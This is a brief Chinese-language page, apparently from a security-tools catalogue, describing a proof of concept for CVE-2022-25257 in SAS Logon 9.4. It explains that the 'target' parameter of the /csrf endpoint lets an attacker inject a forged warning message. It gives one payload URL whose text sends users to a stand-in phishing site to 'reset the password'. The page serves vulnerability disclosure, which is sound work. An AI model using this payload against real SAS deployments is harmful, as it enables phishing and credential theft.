黑客、渗透测试和网络安全工具,武装您的安全武器库!
CVE-2022-25257 的概念验证漏洞利用:SAS Logon 9.4 中的 CSRF 参数注入,可实现警告消息伪造以用于网络钓鱼攻击。
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
SAS Logon 9.4 允许注入警告消息。
发现日期:2022年2月15日
受影响版本:
9.4
POC 利用代码:
SASLogon/csrf 有一个名为 "target" 的参数
该参数会影响用户即将打开的 URL 的警告消息(但由于来源未知,系统会将其拦截)。 通过更改该参数,攻击者可以写入一条长长的虚假声明,从而影响不知情的用户。
有效载荷示例:https://example:8343/SASLogon/csrf?target=Hello%20Dear%20customers%20during%20the%20corona%20pandemic%20our%20new%20website%20is%20at%20http://evilRobertsWeb.com%20please%20visit%20this%20link%20to%20reset%20the%20password
图片: